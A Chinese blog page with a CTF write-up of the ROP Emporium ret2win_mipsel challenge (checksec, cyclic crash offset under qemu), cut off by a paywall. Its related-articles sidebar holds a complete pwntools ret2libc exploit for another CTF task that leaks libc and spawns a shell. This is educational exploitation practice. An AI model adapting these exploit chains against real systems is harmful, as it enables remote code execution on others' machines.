ROP_Emporium_ret2win_mipsel

最新推荐文章于 2025-08-05 13:08:05 发布
原创 最新推荐文章于 2025-08-05 13:08:05 发布 · 404 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#bash #linux #gnu

本文介绍了针对MIPS架构的ret2win_mipsel程序进行的信息收集、黑盒测试及反汇编分析。通过ulimit设置、cyclic测试和gdb调试确定了程序崩溃偏移。在检查程序安全特性时发现存在栈溢出,但无 Canary保护,且NX启用。使用ida反汇编进一步理解函数布局,确定了payload构造的关键点。最终编写并展示了Exp来利用这个栈溢出漏洞,但由于找不到main函数返回地址,导致程序陷入无限循环。

文章目录

ret2win_mipsel

依赖:

sudo apt install qemu-mipsel-static gcc-mipsel-linux-gnu

信息收集

$ file ret2win_mipsel
ret2win_mipsel: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld.so.1, for GNU/Linux 3.2.0, BuildID[sha1]=cef0d672b72ee9c102ff2202072581aabafcb561, not stripped
$ checksec ret2win_mipsel
[*] '/home/starr/Documents/CProject/pwn/ret2win_mipsel'
    Arch:     mips64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE

这里checksec显示是64位程序,应该错了,,

黑盒测试

$ ulimit -c unlimited && sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern'
$ cyclic 200 > cyclic.txt
$ qemu-mipsel-static ./ret2win_mipsel < cyclic.txt
ret2win by ROP Emporium
MIPS

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault
$ gdb-multiarch ./ret2win_mipsel  qemu_ret2win_mipsel_20220506-203156_19548.core
...
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x6161616a in ?? ()
$ cyclic -l 0x6161616a
36

崩溃偏移位于36字节。

反汇编

$ mipsel-linux-gnu-objdump -d ret2win_mipsel

ret2win_mipsel:     file
最低0.47元/天 解锁文章
ROP链-BUUCTF-inndy_ropret2syscall)
Welcome To Myon'Blog !
05-08 631
因为 pop dword ptr [ecx] 一次只能写入 4 个字节,所以我们分两次写入 /bin/sh。静态链接就意味着没法去打 ret2libc 了,因为 ret2libc 需要用到动态链接库里面的系统函数。后面就是常规的 ret2syscall 了,即系统调用 execve。既然有对 [ecx] 操作的,那么我们就继续找弹出 ecx 的指令。注意到左侧函数表有很多的函数,说明这个程序是静态链接的。找一个具有写权限的段,一般都是在 bss 段。找了一下,没有字符串 /bin/sh。
mips 64-bit系统上编译32-bit程序
布拉
07-23 963
环境 基于debian的uos系统 mips 架构 64 bit系统 安装gcc-multilib sudo apt install gcc-multilib 如果不安装这个包将会报错: uos@uos-PC:~/zlj/ltp/testcases/kernel/syscalls/stime$ gcc 1.c -mabi=32 In file included from 1.c:4: /usr/include/stdio.h:27:10: fatal error: bits/libc-header-st
rop emporium 2020】ret2win
^_^
02-06 589
这篇博客主要是关于rop emporium2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。 题目链接:https://ropemporium.com/challenge/ret2win.html 32位 反编译后: int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0, 2, 0); puts.
gdb 远程qemu-arm调试
span76的专栏
06-17 6814
把 c 编译成 arm 指令的可执行文件  /usr/bin/arm-linux-gnueabi-g++ hello.cpp  cat hello.cpp #include void crash(){ char *a=0; *a=0; } int main() { printf("hello world\n"); crash();
Mac M1/M3 使用docker报错qemu: uncaught target signal 11 (Segmentation fault) - core dump
午夜阳光
06-26 403
在Mac上安装了docker桌面版,自带k8s集群,在访问k8s pod时,报错" uncaught target signal 11 (Segmentation fault) - core dump"
mips-linux-gnu-gcc,MIPS平台gcc交叉编译MSB和LSB问题
weixin_34195649的博客
05-13 1894
MIPS平台gcc交叉编译MSB和LSB问题最近在做mips平台的工作,在交叉编译软件包的时候发现的问题现在记录下来,当我们用linux命令file一个文件的时候会出现如:libiconv.so.2.5.0: ELF 32-bit LSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, with unkn...
mac docker 运行mysql5.7 镜像失败解决
moon548834的博客
06-26 1083
用上面的这个方法跑了一年多没有问题,最近因为其他需求升级了下docker desktop到最新(4.31) ,这时mysql容器就有了文章最开头的问题。这个选项打勾, 重启docker desktop就可以了, 如果没有这个选项,说明你的docker desktop太久了或者mac os太老了,尽快升级吧!研究了下,解决方案就是用rosetta, 这是一个能在arm64上运行x86/64指令集的一个指令翻译的东西,把这个rosetta通过下面这个命令下载下来。
ROP_Emporium_ret2win
Starr
03-23 804
文章目录1. ret2win32信息收集反汇编Exp2. ret2win反汇编Exp 题目下载地址:ROP Emporium 1. ret2win32 信息收集 $ file ret2win32 ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1
ROP_Emporium_split
Starr
03-24 386
文章目录1. split32信息收集黑盒测试反汇编Exp调试分析2. split黑盒测试反汇编Exp参考文章 1. split32 信息收集 $ file split32 split32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=76cb700a2ac0484f
ROP_Emporium_badchars
Starr
03-25 938
文章目录1. badchars32信息收集黑盒测试反汇编思路Exp2. badchars信息反汇编构造Payload调试分析Exp3. 参考文章 1. badchars32 信息收集 题目提供了一个可执行文件badchars32, 一个动态库libbadchars32.so,一个flag.txt。 $ file badchars32 badchars32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked
ubuntu/gcc g++ 报错 ld terminated with signal 11 [Segmentation fault], core dumped
sinat_37322535的博客
01-28 3432
ubuntu编译过程中链接异(gcc g++ 无法编译) 欢迎使用Markdown编辑器 无论gcc还是g++都显示有以下段错误,无法成功链接 collect2: fatal error: ld terminated with signal 11 [Segmentation fault], core dumped compilation terminated. 在stackoverflow中找到一个Q&A解决。特此记录 依次执行了以下命令后可以重新正常编译链接。 sudo apt purge bin
【转】搭建带软浮点交叉编译工具链
Elta学习
07-03 1774
一 使用crosstool-ng为s3c6410制作交叉编译工具链 来自:http://www.usr.cc/thread-51735-1-1.html     - 前言     以前都是用别人做好的工具链,现在想自己做个工具链。先是看看CLFS的文档,对交叉编译工具链的编译过程有个基本了解,然后下载codesource cs2008q3的源代码包,根据其提供的编译脚本,花了一天时间
collect2: fatal error: ld terminated with signal 11 [Segmentation fault], core dumped
M2嵌入式
08-12 5415
Linux环境下的编译错误: collect2: fatal error: ld terminated with signal 11 [Segmentation fault], core dumped 这么奇葩的错误,也百度不出来,所以记录下 查错,仔细检查链接的库能不能找到。经过查找我们的库确实是可以找到的 在终端输入ld --version还是报错 这就说明是环境本身的配置有问题 解决ld 引起错误的方法 sudo apt purge binutils sudo apt remove make s
linux单步运行程序,linux – 如何在QEMU上的GDB中单步执行ARM程序集?
weixin_35086195的博客
05-02 358
我正在尝试使用GNU汇编程序学习ARM汇编程序编程.我用QEmu设置了我的PC,并拥有Debian ARM-HF chroot环境.如果我汇编并链接我的测试程序:.text.global _start_start:mov r0,#6bx lr有:as test.s -o test.old test.o -o test然后将文件加载到gdb并在_start上设置断点:root@La...
最新!立创泰山派编译debian镜像源报错解决方法,自研亲测有效
2401_83627562的博客
08-05 2711
摘要: 本文记录了一名大学生在嘉立创嵌入式Linux训练营中遇到debian编译报错问题的解决过程。由于网易镜像源已不支持debian10(buster),作者通过更换腾讯镜像源并修改配置文件初步解决问题,但后续仍遭遇sources.list被覆盖的报错。通过分析Makefile中的删除指令,注释相关行以保护文件修改,最终成功完成编译。文章详细分享了排查思路和具体操作步骤,为遇到类似问题的开发者提供了参考方案。
GCC -l 选项添加链接库
程永强
09-29 2232
GCC -l 选项添加链接库 链接器把多个二进制的目标文件 (object file) 链接成一个单独的可执行文件。在链接过程中,必须把符号 (变量名、函数名等标识符) 用对应的内存地址 (变量地址、函数地址等) 替代,以完成程序中多个模块的外部引用。 链接器也必须将程序中所用到的所有 C 标准库函数加入其中。对于链接器而言,链接库不过是一个具有许多目标文件的集合,它们在一个文件中以方便处理。 当把程序链接到一个链接库时,只会链接程序所用到的函数的目标文件。在已编译的目标文件之外,如果创建自己的链接库,可以
linux交叉编译 mips,linux – 从x86交叉编译MIPS路由器
weixin_35712223的博客
05-10 446
你是对的,你需要一个正确的mips工具链来交叉编译你的应用程序,而Buildroot可以做到这一点.但是您可能需要调整buildroot的菜单选项.根据文件的输出,您的选项可能会更改.在我的系统上,二进制应用程序通知以下内容:ELF 32位MSB可执行文件,MIPS,MIPS32 rel2版本1(SYSV)这些是我为Buildroot的menuconfig启用的选项:Target Architec...
TCUDUMP 交叉编译及使用
chituhuan的专栏
08-31 3081
一:下载源码:libpcap-1.1.1.tar.gz  tcpdump-4.1.1.tar.gz 二:编译libpcap 首先生成makefile,按照标准的交叉编译方法进行。 1. root@wang:/work/libpcap-1.1.1# ./configure --host=mipsel-linux --prefix=/work/tcpdump configure: WARNI
[HarekazeCTF2019]baby_rop2 1
最新发布
10-27
[HarekazeCTF2019]baby_rop2是一道64位、开启了NX保护的Pwn题目,利用思路为ret2libc,涉及printf函数和read函数。程序中定义了`char buf[28];`,但在使用`read(0, buf, 0x100uLL);`时,向buf读取输入最多256(0x100)个无符号长整型常量,而buf数组大小仅为128,存在缓冲区溢出漏洞[^1]。 以下是该题的一个解题脚本: ```python from pwn import * from LibcSearcher import * #p = process('./babyrop2') p = remote("node5.buuoj.cn", 29847) elf = ELF('./babyrop2') printf_plt = elf.plt['printf'] read_got = elf.got['read'] main_address = 0x400636 pop_rdi = 0x400733 pop_rsi_r15 = 0x400731 formart_str = 0x400770 payload1 =b'a' * (0x20 + 8) + p64(pop_rdi) + p64(formart_str) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_address) p.sendlineafter("name? ", payload1) read_address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) print(hex(read_address)) libc = ELF('./libc.so.6') offset = read_address - libc.symbols['read'] binsh = offset + libc.search('/bin/sh').__next__() system = offset + libc.symbols['system'] payload2 = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(binsh)+ p64(system) p.sendline(payload2) p.interactive() ``` 该脚本的攻击思路是,第一次泄露一个地址,然后获取system函数地址和`/bin/sh`字符串,第二次实现注入。具体是先通过构造`payload1`进行栈溢出,覆盖返回地址,用printf函数输出read函数的地址,再返回主函数使栈初始化,以便再次进行栈溢出。发送完`payload1`后,函数先运行到`return 0`,再执行构造的语句,因为返回地址已被覆盖。之后根据泄露的read函数地址计算偏移,进而得到system函数和`/bin/sh`字符串的地址,构造`payload2`实现最终的注入并获取交互shell [^3][^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值